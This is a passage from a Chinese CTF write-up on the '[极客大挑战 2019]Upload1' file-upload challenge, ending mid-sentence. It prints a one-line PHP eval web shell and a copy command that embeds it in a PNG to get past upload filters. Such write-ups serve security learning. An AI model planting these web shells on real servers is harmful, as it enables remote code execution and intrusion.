CTF做题笔记--[极客大挑战 2019]Upload1

一切的训练都是为了实战，勿做空谈家！！！

相关知识点速查

总结：【WEB】文件上传 | 狼组安全团队公开知识库

上传绕过：文件上传绕过速查 - FreeBuf网络安全行业门户

插曲

先上传一个php文件，报错说明对后缀名或文件类型进行了检测。

上传图片马试试，图片马制作：

#创一个文件夹，其中有一个图片文件haha.png, 一个木马文件xixi.php(内容为：<?php @eval($_POST['rc']);?>), 在文件所在终端执行如下命令： copy haha.png/b+xixi.php/a woshi.png //"woshi.png"是随便取名的，也是要上传的图片马

传入之后，出现警告，说文件中包含'<?',说明对图片文件进行了读取识别。需要构造不含"<?"的木马才行：

&l